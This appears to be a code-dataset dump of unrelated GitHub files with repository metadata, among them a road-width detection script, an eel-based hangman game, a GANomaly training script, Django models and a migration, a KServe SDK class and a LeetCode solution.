            # elbow: first k where the SSE drop flattens below 10
            for i in range(len(SSE) - 1):
                if SSE[i] - SSE[i + 1] < 10:
                    k = i + 1
                    break
            # print(line_length)
            model = KMeans(k)
            try:
                model.fit(dist_ls)
            except ValueError:
                # No usable pairs at all: return placeholder polygons.
                return (default_polygon, 0, line_length) if side else (
                    default_polygon, default_polygon, 0, 0, line_length)
            # print(model.cluster_centers_)
            # print('distance: ', max(model.cluster_centers_))
            # The largest cluster centre is taken as the road width; keep
            # the pairs belonging to that cluster.
            dist_label = list(model.cluster_centers_).index(max(model.cluster_centers_))
            dist_labels = [i for i, _ in enumerate(list(model.labels_)) if _ == dist_label]
            ##################################################################################
            # show pair with road width
            img_copy = img.copy()
            for i in range(len(center_line[:-1])):
                cv2.line(
                    img_copy,
                    tuple(map(int, center_line[i])),
                    tuple(map(int, center_line[i + 1])),
                    (0, 0, 127),
                    thickness=5
                )
            for i in dist_labels:
                color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
                pt1 = int(list(dist_dict.keys())[i][0])
                pt2 = int(list(dist_dict.keys())[i][1])
                for pt in [pt1, pt2]:
                    cv2.line(img_copy,
                             tuple(map(int, (df_segment_filter.loc[pt, 'x1'], df_segment_filter.loc[pt, 'y1']))),
                             tuple(map(int, (df_segment_filter.loc[pt, 'x2'], df_segment_filter.loc[pt, 'y2']))),
                             color,
                             thickness=3
                             )
            img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
            if show_paired_segment:
                cv2.imshow(' ', img_copy)
                cv2.waitKey(0)
                cv2.destroyAllWindows()
            ##########################################################################################
            # determine a mask: average each pair's edge distance to the
            # centreline, per side of the road
            line1_dist = []
            line2_dist = []
            for i in dist_labels:
                lines = list(dist_dict.keys())[i]
                line1 = df_segment.loc[lines[0]]
                line2 = df_segment.loc[int(lines[1])]
                linestring1 = LineString([(line1.x1, line1.y1), (line1.x2, line1.y2)])
                linestring2 = LineString([(line2.x1, line2.y1), (line2.x2, line2.y2)])
                pt1 = Point((line1.x1 + line1.x2) / 2, (line1.y1 + line1.y2) / 2)
                pt2 = Point((line2.x1 + line2.x2) / 2, (line2.y1 + line2.y2) / 2)
                # Assign each segment of the pair to a side depending on
                # which falls inside the single-sided area selected_area1.
                if selected_area1.intersects(linestring1) and not selected_area1.intersects(linestring2):
                    line1_dist.append(LineString(center_line).distance(pt1))
                    line2_dist.append(LineString(center_line).distance(pt2))
                elif selected_area1.intersects(linestring2) and not selected_area1.intersects(linestring1):
                    line1_dist.append(LineString(center_line).distance(pt2))
                    line2_dist.append(LineString(center_line).distance(pt1))
                elif selected_area1.intersects(linestring1):
                    line1_dist.append(max(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
                    line2_dist.append(min(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
                else:
                    line2_dist.append(max(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
                    line1_dist.append(min(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
            line1_dist = sum(line1_dist) / len(line1_dist)
            line2_dist = sum(line2_dist) / len(line2_dist)
            # Buffer the centreline by the averaged distances to form the masks.
            mask1 = LineString(center_line).buffer(signal * line1_dist, cap_style=2, join_style=2, single_sided=True)
            mask2 = LineString(center_line).buffer(-signal * line2_dist, cap_style=2, join_style=2, single_sided=True)
            img_copy = img.copy()
            mask1_buffer = list(
                zip(map(int, mask1.exterior.coords.xy[0]), map(int, mask1.exterior.coords.xy[1])))
            mask2_buffer = list(
                zip(map(int, mask2.exterior.coords.xy[0]), map(int, mask2.exterior.coords.xy[1])))
            # draw selected area
            cv2.drawContours(
                img_copy,
                [np.array(mask1_buffer)],
                -1,
                (68, 140, 204),
                thickness=cv2.FILLED
            )
            if not side:
                cv2.drawContours(
                    img_copy,
                    [np.array(mask2_buffer)],
                    -1,
                    (68, 140, 204),
                    thickness=cv2.FILLED
                )
            for i in range(len(center_line[:-1])):
                cv2.line(
                    img_copy,
                    tuple(map(int, center_line[i])),
                    tuple(map(int, center_line[i + 1])),
                    (0, 0, 127),
                    thickness=5
                )
            # annotation box with road length / width
            cv2.rectangle(
                img_copy,
                (20, 20),
                (600, 100),
                (255, 255, 255),
                cv2.FILLED
            )
            cv2.putText(
                img_copy,
                'road length: {} m'.format(int(line_length)),
                (50, 50),
                cv2.FONT_HERSHEY_COMPLEX,
                1,
                (0, 0, 0),
                thickness=2
            )
            cv2.putText(
                img_copy,
                'road width: {} m'.format(round(max(model.cluster_centers_)[0], 1)),
                (50, 90),
                cv2.FONT_HERSHEY_COMPLEX,
                1,
                (0, 0, 0),
                thickness=2
            )
            for i in dist_labels:
                color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
                pt1 = int(list(dist_dict.keys())[i][0])
                pt2 = int(list(dist_dict.keys())[i][1])
                for pt in [pt1, pt2]:
                    cv2.line(img_copy,
                             tuple(map(int, (df_segment_filter.loc[pt, 'x1'], df_segment_filter.loc[pt, 'y1']))),
                             tuple(map(int, (df_segment_filter.loc[pt, 'x2'], df_segment_filter.loc[pt, 'y2']))),
                             color,
                             thickness=3
                             )
            cv2.addWeighted(
                img_copy, 0.5, img, 0.5, 0, img_copy
            )
            img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
            # cv2.imwrite(mask_name, img_copy)
            if show_mask:
                cv2.imshow(' ', img_copy)
                cv2.waitKey(0)
                cv2.destroyAllWindows()
            # draw mask onto the shared accumulator image
            # (uses the last `color` from the loop above)
            cv2.drawContours(
                img_mask,
                [np.array(mask1_buffer)],
                -1,
                color,
                thickness=cv2.FILLED
            )
            if not side:
                cv2.drawContours(
                    img_mask,
                    [np.array(mask2_buffer)],
                    -1,
                    color,
                    thickness=cv2.FILLED
                )
            for i in range(len(center_line[:-1])):
                cv2.line(
                    img,
                    tuple(map(int, center_line[i])),
                    tuple(map(int, center_line[i + 1])),
                    (0, 0, 127),
                    thickness=5
                )
            # One-sided call returns (mask, width, length);
            # both-sides call returns (mask1, mask2, width1, width2, length).
            return (mask1, round(line1_dist * resolution, 2), round(line_length, 2)) if side else \
                (mask1, mask2, round(line1_dist * resolution, 2), round(line2_dist * resolution, 2),
                 round(line_length, 2))

        def get_selected_area(signal):
            # Single-sided detection strip for divided roads: buffer by
            # `offset` on one side, include a 3.5 m strip on the other,
            # clip away other roads and the image frame.
            selected_area = LineString(center_line).buffer(
                signal * offset, cap_style=2, join_style=2, single_sided=True
            ).union(
                LineString(center_line).buffer(-signal * 3.5 / resolution, cap_style=2, join_style=2, single_sided=True)
            ).difference(
                boundary_area).intersection(Polygon([(0, 0), (img_width, 0), (img_width, img_height), (0, img_height)]))
            selected_area1 = LineString(center_line).buffer(signal * offset, cap_style=2, join_style=2,
                                                            single_sided=True).difference(boundary_area)
            return selected_area, selected_area1

        if geo_info.CARTO == 4 and not geo_info.ONEWAY:
            # Two-way class-4 roads: detect each side of the centreline separately.
            selected_area, selected_area1 = get_selected_area(1)
            mask1, road_width1, road_length = get_mask(selected_area, selected_area1, '_1')
            selected_area, selected_area1 = get_selected_area(-1)
            mask2, road_width2, road_length = get_mask(selected_area, selected_area1, '_0', -1)
        else:
            # Everything else: one symmetric detection area around the centreline.
            selected_area = LineString(center_line).buffer(offset, cap_style=2, join_style=2).difference(
                boundary_area).intersection(Polygon([(0, 0), (img_width, 0), (img_width, img_height), (0, img_height)]))
            selected_area1 = LineString(center_line).buffer(offset, cap_style=2, join_style=2,
                                                            single_sided=True).difference(boundary_area)
            mask1, mask2, road_width1, road_width2, road_length = get_mask(selected_area, selected_area1, '')
        # write to file
        # NOTE(review): both branches of this ONEWAY check assign the same
        # values -- the distinction appears to be dead; confirm intent.
        if not geo_info.ONEWAY:
            gdf_line.loc[line_index, 'width_1'] = road_width1
            gdf_line.loc[line_index, 'width_0'] = road_width2
        else:
            gdf_line.loc[line_index, 'width_1'] = road_width1
            gdf_line.loc[line_index, 'width_0'] = road_width2
        gdf_line.loc[line_index, 'mask'] = mask1 if mask2 == default_polygon else \
            mask2 if mask1 == default_polygon else mask1.union(mask2)
        gdf_line.loc[line_index, 'width'] = road_width1 + road_width2
        gdf_line.loc[line_index, 'length'] = road_length
    # Blend the accumulated masks over the image and persist the results.
    cv2.addWeighted(
        img_mask, 0.5, img, 0.5, 0, img_mask
    )
    img_mask = cv2.resize(img_mask, resize_size, interpolation=cv2.INTER_CUBIC)
    cv2.imwrite(os.path.join(file_path, 'mask.png'), img_mask)
    gdf_line.to_csv(geo_selected_file)
    return gdf_line
if __name__ == '__main__':
    # Example run: detect the road mask for a Toronto location.
    main('../output/eg', 43.668581, -79.394941)
| [
"noreply@github.com"
] | noreply@github.com |
e7d0a57e61f5128144b8fba4688b78dcef94f422 | fce6b6b1d7b289caf17a71961f9b8879cfd31cbc | /app.py | d89d224d1fb053e1506d9e8edda8cd6c3f6a0e53 | [] | no_license | bigboy32/IITRoorkee-Hackathon-Project | f5c9c4e1326a2a2cfd8c0c21504d59c239e56576 | 4760113c4b9bedd4fc17f9e51aa135eeb700a4b2 | refs/heads/main | 2023-02-16T04:40:47.880885 | 2021-01-05T14:59:22 | 2021-01-05T14:59:22 | 326,495,922 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,486 | py | from indic_transliteration import sanscript
from indic_transliteration.sanscript import transliterate
import eel
import random
import string
import time
import os
import sys
import pickle
import configparser
import requests
eel.init('backend')
str2dev = lambda data: transliterate(data, sanscript.HK, sanscript.DEVANAGARI)
def getglobs():
x = pickle.load(open("glob.pkl", "rb"))
return x
def setglobs(goal, q, dq, caq):
open("glob.pkl", "wb").truncate()
pickle.dump([goal, q, dq, caq], open("glob.pkl", "wb"))
class HangmanHandler():
dq = 0
cur = open("db.txt", "r")
s = random.sample(cur.readlines(), 1)
word = random.choice(s).lower().replace("\n", "").rstrip().split(":", 1)
hint = word[1]
word = word[0]
hangman = 0
uw = []
w = string.ascii_lowercase
full_word = []
fw = []
dev_word = str2dev(word)
dev_fword = []
dev_fw = []
for item in range(len(list(word))):
full_word.append("_")
for item in range(len(list(dev_word))):
dev_fword.append("_")
def update_db(self, w):
cur = open("db.txt", "w")
print("Ok, now type the words, and i will save it in the database. Type QUIT to exit")
while True:
cur.write(w+"\n")
cur.close()
def play_game(self, guess):
char = guess
indecies = [i for i, x in enumerate(self.word) if x == char]
if indecies != []:
self.fw = list(self.full_word)
for item in indecies:
self.fw[item] = char
self.full_word = "".join(str(v) for v in self.fw)
if self.full_word == self.word:
return "FULL"
else:
self.uw.append(char)
return "HALF"
else:
self.uw.append(char)
return "BAD"
def smb_game(self, guess):
char = guess
indecies = [i for i, x in enumerate(self.dev_word) if x == char]
if indecies != []:
self.dev_fw = list(self.dev_fword)
for item in indecies:
self.fw[item] = char
self.dev_fword = "".join(str(v) for v in self.fw)
if self.dev_fword == self.dev_word:
return "FULL"
else:
self.uw.append(char)
return "HALF"
else:
self.uw.append(char)
return "BAD"
global handler_img
handler_img = [HangmanHandler(), 0]
def reset():
handler_img[0] = HangmanHandler()
'''
@eel.expose()
def start_game():
handler = handler_img[0]
eel.uiFinish()
eel.txt_hint()
eel.set_full_word("".join(str(v) + " " for v in handler.full_word))
eel.set_txt_hint(handler.hint)
handler_img[0] = handler
'''
@eel.expose()
def push():
h = handler_img[0]
burl = "https://RK3K3UG6BXQM6ZIF.anvil.app/_/private_api/7RW34ZQIM63GI2AUA6WWADJI/update_leaderboard/"
try:
tok = configparser.ConfigParser()
tok.read("config.ini")
tok = tok["push"]["token"]
except:
eel.a("Invalid Token! Please Close The Brower To Exit")
exit()
else:
burl += tok
burl += "/" + str(h.dq)
requests.get(burl)
eel.a("You can close the Browser-window")
exit()
@eel.expose()
def fwrite(tk):
with open("config.ini", "w") as f:
f.write(f"""
[push]
token={tk}
""")
@eel.expose()
def start_game():
handler = handler_img[0]
if "http" in handler.hint or "images/" in handler.hint:
eel.img_hint()
eel.set_full_word("".join(str(v) + " " for v in handler.full_word))
eel.set_pic_hint(handler.hint)
else:
eel.txt_hint()
eel.set_full_word("".join(str(v) + " " for v in handler.full_word))
eel.set_txt_hint(handler.hint)
eel.uiFinish()
eel.kpec()
@eel.expose()
def keypress(key):
handler = handler_img[0]
img = handler_img[1]
res = handler.play_game(key.lower())
eel.set_full_word("".join(str(v) + " " for v in list(handler.full_word)))
if res == "BAD":
base_url = "https://raw.githubusercontent.com/simonjsuh/Vanilla-Javascript-Hangman-Game/master/images/{}.jpg"
if img == 6:
eel.looseScreen()
eel.init_page_l()
else:
eel.updateHangman(base_url.format(str(img + 1)))
img += 1
if res == "FULL":
eel.winScreen()
eel.init_page_w()
handler.dq += 1
handler_img[1] = img
handler_img[0] = handler
@eel.expose()
def startWin():
eel.flwRain()
@eel.expose()
def smbKeypress(key):
    # Devanagari-mode counterpart of keypress(): routes the guess through
    # handler.smb_game and updates the Devanagari word display.
    # NOTE(review): unlike keypress(), this does not bump handler.dq on a
    # win -- confirm whether that is intentional.
    handler = handler_img[0]
    img = handler_img[1]  # wrong guesses so far (0..6)
    res = handler.smb_game(key.lower())
    eel.setDeva("".join(str(v) + " " for v in list(handler.dev_fword)))
    if res == "BAD":
        base_url = "https://raw.githubusercontent.com/simonjsuh/Vanilla-Javascript-Hangman-Game/master/images/{}.jpg"
        if img == 6:
            eel.looseScreen()
            eel.init_page_l()
        else:
            eel.updateHangman(base_url.format(str(img + 1)))
            img += 1
    if res == "FULL":
        eel.winScreen()
        eel.init_page_w()
    handler_img[1] = img
    handler_img[0] = handler
@eel.expose()
def set_full():
    """Reveal the complete answer word (shown in red on the lose screen)."""
    eel.set_full_word_red(handler_img[0].word)
@eel.expose()
def restart():
    """Begin a fresh round: zero the wrong-guess counter, install a new
    handler via reset(), then ask the frontend to reload."""
    handler_img[1] = 0
    reset()
    eel.reload()
@eel.expose()
def res():
    """Ask the frontend to reopen the page."""
    eel.reopen()
# Launch the eel app (blocks until the window closes); the except guard
# swallows the error eel raises when the browser window is closed so the
# process can exit quietly.
try:
    eel.start('main.html')
except:
    pass
| [
"anantha1.coolkopf@gmail.com"
] | anantha1.coolkopf@gmail.com |
57fba70996c5020d941fdc5ac32be0f9eb38101e | e6acc3021714e47345213d13d6344e2d89d4a960 | /streamlit_analytics/__init__.py | 52fbbd335c80c4ce6d68b508bce9a1106a4d77f0 | [
"MIT"
] | permissive | napoles-uach/streamlit-analytics | 157aa7521647dbe490c75af893361aa6e0ff613b | fe5a7855889a66cf8d6f3eabf8841f5c00e9b492 | refs/heads/main | 2023-03-01T20:42:58.361148 | 2021-01-29T23:32:28 | 2021-01-29T23:32:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | __version__ = "0.2.1"
from .main import track, start_tracking, stop_tracking, counts
| [
"johannes.rieke@gmail.com"
] | johannes.rieke@gmail.com |
a6d4c52e7e37fccfa1084300681c5bb04d9ed311 | 3074f3d65df6b4a539e0c3551036861ddeffa2c8 | /Lab 1/http_getter.py | f9a83ac236d6e601af3bc0b34b2324a6c40c4cfa | [] | no_license | VladCroitoru/SI-labs | 3b294aa6afad711a9c46f94d9dc785e8bae957e0 | 8f5d92acf25cfdc699eb3bd10ce0828975f239cf | refs/heads/master | 2021-09-13T09:26:16.239564 | 2018-04-27T19:12:43 | 2018-04-27T19:12:43 | 106,518,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from urllib2 import urlopen
url = 'http://agora.md/categorii/actual'
response = urlopen(url)
#data = str(response.read())
#print(data)
print(str(response.read()) | [
"noreply@github.com"
] | noreply@github.com |
2574993ffb7fa1778720fb71a93a76a1a38674a9 | 499a3bb112d4416df9fe5184107ed2798f669410 | /train.py | b60d5dc1455aaffd7a1f83cedcb8397493fa5eee | [] | no_license | KerrWu/GANomaly | 9dfa77fb63dc0e84d6088fa0a1aeca49bf4a40be | a9d5a97fb1463d686d40c30bd8590bd139010cf0 | refs/heads/master | 2020-06-22T16:59:05.118798 | 2019-07-19T12:28:07 | 2019-07-19T12:28:07 | 197,749,927 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | """
TRAIN GANOMALY
. Example: Run the following command from the terminal.
run train.py \
--model ganomaly \
--dataset UCSD_Anomaly_Dataset/UCSDped1 \
--batchsize 32 \
--isize 256 \
--nz 512 \
--ngf 64 \
--ndf 64
"""
##
# LIBRARIES
from __future__ import print_function
from options import Options
from lib.data import load_data
from lib.model import Ganomaly
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "7"
##
# def main():
""" Training
"""
##
# ARGUMENTS
opt = Options().parse()
##
# LOAD DATA
dataloader = load_data(opt)
##
# LOAD MODEL
model = Ganomaly(opt, dataloader)
##
# TRAIN MODEL
model.train()
# if __name__ == '__main__':
# main()
| [
"wz_0818@163.com"
] | wz_0818@163.com |
2cd609a30463f7c20347425e3e0629b4dc0a16a4 | 861f7ada9137bc2ee025dce11de194991dd05bde | /blog/migrations/0001_initial.py | d708ab237e0a189bd1fae35bfa2c16541ad67f00 | [] | no_license | SpiritForge/my-first-blog | 2ad582ffdebd1b651aed43e4b70e33b9a7e47ad1 | 760f1504bb0add6ed31c4094e9a761352396d1b4 | refs/heads/master | 2021-01-10T15:45:54.763763 | 2016-02-19T01:54:27 | 2016-02-19T01:54:27 | 52,053,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-17 02:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated (Django 1.9) initial migration: creates the blog `Post`
    # model with an `author` FK to the project's configured user model.
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"jack.tinker@gmail.com"
] | jack.tinker@gmail.com |
820d4de9dbd33948240b4ae2add3a0af6d4424e9 | 7a48df5a4405c295eb28f8f6b5a112207c20ceda | /setup.py | 7bd61ce40cd3614969d5d0eaa3ca24a0f60136e4 | [
"BSD-2-Clause"
] | permissive | deebuls/youbot_pykdl | 86fdf20d66ae0cf8fde5a332563ebdd4f2d2b6b1 | bff0d41000e7c5c3dd1ee0dfabfbcc1a3f9152e8 | refs/heads/master | 2021-01-19T08:23:41.898014 | 2015-06-30T00:46:14 | 2015-06-30T00:46:14 | 38,256,716 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# Build the setup() kwargs from the catkin package.xml, then register the
# Python packages that live under src/.
d = generate_distutils_setup()
#d['packages'] = ['youbot_pykdl', 'youbot_kdl', 'urdf_parser_py']
d['packages'] = ['youbot_pykdl', 'youbot_kdl']
d['package_dir'] = {'': 'src'}
setup(**d)
| [
"deebuls@gmail.com"
] | deebuls@gmail.com |
76eeb3e354352d6dfd8a7b6d6e3e27b30af289a5 | 43eb7f8581a8dbfa1298b4e6d84fc7b7a552e335 | /python/kserve/kserve/models/v1beta1_inference_service_status.py | f509e6bb2db9b1958db1fd812b355ccd0c7546b0 | [
"Apache-2.0"
] | permissive | Suresh-Nakkeran/kserve | c2d114f7258a70b4c8ddeb8ee8c584d4eee0f81b | d3910e0fc6af4bf73156a53bd912d6e4acc87533 | refs/heads/master | 2023-07-29T00:17:28.900100 | 2021-09-11T08:04:54 | 2021-09-11T08:04:54 | 406,243,335 | 0 | 0 | Apache-2.0 | 2021-09-14T05:59:05 | 2021-09-14T05:59:04 | null | UTF-8 | Python | false | false | 9,203 | py | # Copyright 2020 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
KServe
Python SDK for KServe # noqa: E501
The version of the OpenAPI document: v0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kserve.configuration import Configuration
class V1beta1InferenceServiceStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'address': 'KnativeAddressable',
'annotations': 'dict(str, str)',
'components': 'dict(str, V1beta1ComponentStatusSpec)',
'conditions': 'list[KnativeCondition]',
'observed_generation': 'int',
'url': 'KnativeURL'
}
attribute_map = {
'address': 'address',
'annotations': 'annotations',
'components': 'components',
'conditions': 'conditions',
'observed_generation': 'observedGeneration',
'url': 'url'
}
def __init__(self, address=None, annotations=None, components=None, conditions=None, observed_generation=None, url=None, local_vars_configuration=None): # noqa: E501
"""V1beta1InferenceServiceStatus - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._address = None
self._annotations = None
self._components = None
self._conditions = None
self._observed_generation = None
self._url = None
self.discriminator = None
if address is not None:
self.address = address
if annotations is not None:
self.annotations = annotations
if components is not None:
self.components = components
if conditions is not None:
self.conditions = conditions
if observed_generation is not None:
self.observed_generation = observed_generation
if url is not None:
self.url = url
@property
def address(self):
"""Gets the address of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeAddressable
"""
return self._address
@address.setter
def address(self, address):
"""Sets the address of this V1beta1InferenceServiceStatus.
:param address: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeAddressable
"""
self._address = address
@property
def annotations(self):
"""Gets the annotations of this V1beta1InferenceServiceStatus. # noqa: E501
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:return: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, str)
"""
return self._annotations
@annotations.setter
def annotations(self, annotations):
"""Sets the annotations of this V1beta1InferenceServiceStatus.
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:param annotations: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, str)
"""
self._annotations = annotations
@property
def components(self):
"""Gets the components of this V1beta1InferenceServiceStatus. # noqa: E501
Statuses for the components of the InferenceService # noqa: E501
:return: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, V1beta1ComponentStatusSpec)
"""
return self._components
@components.setter
def components(self, components):
"""Sets the components of this V1beta1InferenceServiceStatus.
Statuses for the components of the InferenceService # noqa: E501
:param components: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, V1beta1ComponentStatusSpec)
"""
self._components = components
@property
def conditions(self):
"""Gets the conditions of this V1beta1InferenceServiceStatus. # noqa: E501
Conditions the latest available observations of a resource's current state. # noqa: E501
:return: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: list[KnativeCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""Sets the conditions of this V1beta1InferenceServiceStatus.
Conditions the latest available observations of a resource's current state. # noqa: E501
:param conditions: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:type: list[KnativeCondition]
"""
self._conditions = conditions
@property
def observed_generation(self):
"""Gets the observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:return: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""Sets the observed_generation of this V1beta1InferenceServiceStatus.
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:param observed_generation: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:type: int
"""
self._observed_generation = observed_generation
@property
def url(self):
"""Gets the url of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeURL
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this V1beta1InferenceServiceStatus.
:param url: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeURL
"""
self._url = url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return True
return self.to_dict() != other.to_dict()
| [
"noreply@github.com"
] | noreply@github.com |
f67834c0e802a18408ca646d581289a12ab563d3 | 898510713517c54f851d55cafb86cba7717a5419 | /contiguousArray.py | 3c4bfe410e6a109bdde4da997acf19d3703b44d5 | [] | no_license | Jill1627/lc-notes | dd871816adfdbd3b6f7a8992824277de03b7921c | af28e4070e3cab859bfcdc45aca3f31c1e3325fe | refs/heads/master | 2021-01-13T16:40:02.854268 | 2017-09-02T20:04:06 | 2017-09-02T20:04:06 | 78,187,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py | """
LC 525 Contiguous Array - find the maximum length of subarray that have equal amount of 0 and 1
Idea: hashmap, use -1 to represent 0, and 1 to represent 1, whenever there are equal number of 0 and 1, the sum will be 0
Steps:
1. Initialize:
use a hashmap <prefixSum : index>, prefixSum, maxLen, give the map an initial value of indexMap[0] = -1 meaning that a prefixSum = 0 has an index of -1 to start with
2. Loop:
update prefixSum, +1 if it's a 1, -1 if it's a zero
check in hm: if prefixSum already in, meaning from prev index to this index, prefixSum increment = 0, equal number of 0 and 1 is found -> update maxLen
otherwise, add it to hm
"""
class Solution(object):
    def findMaxLength(self, nums):
        """LC 525: length of the longest subarray with equal counts of 0 and 1.

        Treat each 0 as -1 and each 1 as +1; a balanced subarray is one across
        which the running prefix sum does not change.  Remember the first index
        at which every prefix sum occurs; seeing the same sum again at index i
        means nums[first+1 .. i] is balanced.  O(n) time, O(n) space.

        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        first_seen = {0: -1}  # prefix sum -> earliest index it occurred
        prefix = 0
        best = 0
        # enumerate/range instead of the original `xrange`, which is a
        # NameError on Python 3 (and enumerate works on Python 2 as well).
        for i, v in enumerate(nums):
            prefix += 1 if v == 1 else -1
            if prefix in first_seen:
                best = max(best, i - first_seen[prefix])
            else:
                first_seen[prefix] = i
        return best
| [
"JillGao@LEIs-MacBook.local"
] | JillGao@LEIs-MacBook.local |
c4063872a4db9b76de528e21e4ace2f7752522c7 | 8b291b1835e0ece5a151edd12d1ff6d26f3813f5 | /student/models.py | 4be944bd72975b3965d7cf36e660642d8f135b50 | [] | no_license | hanul500/yiruma | bebfa6479b191ed670dc87f80b174a67946b34de | 362f2119d78ff7beb43c58868b09c78c7b56c334 | refs/heads/master | 2022-04-28T18:45:05.230948 | 2020-04-29T10:13:27 | 2020-04-29T10:13:27 | 259,372,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | from django.db import models
# Create your models here.
class Studentinfo(models.Model):
    """Student record with billing/card details for the academy app."""

    def __str__(self):
        return str(self.stu_name)

    stu_id = models.CharField(blank=True, null=True, max_length=120)  # e.g. "S0007"
    stu_name = models.CharField(blank=True, null=True, max_length=120)
    stu_num = models.CharField(blank=True, null=True, max_length=120)
    stu_category = models.CharField(blank=True, null=True, max_length=120)
    stu_card = models.CharField(blank=True, null=True, max_length=120)
    stu_cardbank = models.CharField(blank=True, null=True, max_length=120)
    stu_validdate = models.CharField(blank=True, null=True, max_length=120)
    stu_subj = models.CharField(blank=True, null=True, max_length=120)
    stu_money = models.IntegerField(blank=True, null=True)

    class Meta:
        ordering = ['stu_name']

    def make_id(self):
        """Assign the next sequential id of the form "S%04d".

        Fix: the original took max() over the *string* id suffixes, which is
        a lexicographic comparison and picks the wrong maximum as soon as
        ids have differing digit counts ("9999" > "10000" as strings);
        compare numerically instead.
        """
        if Studentinfo.objects.last():
            numbers = [int(s.stu_id[1:]) for s in Studentinfo.objects.all()]
            self.stu_id = "S" + "%04d" % (max(numbers) + 1)
        else:
            self.stu_id = "S0000"
| [
"hanul500@naver.com"
] | hanul500@naver.com |
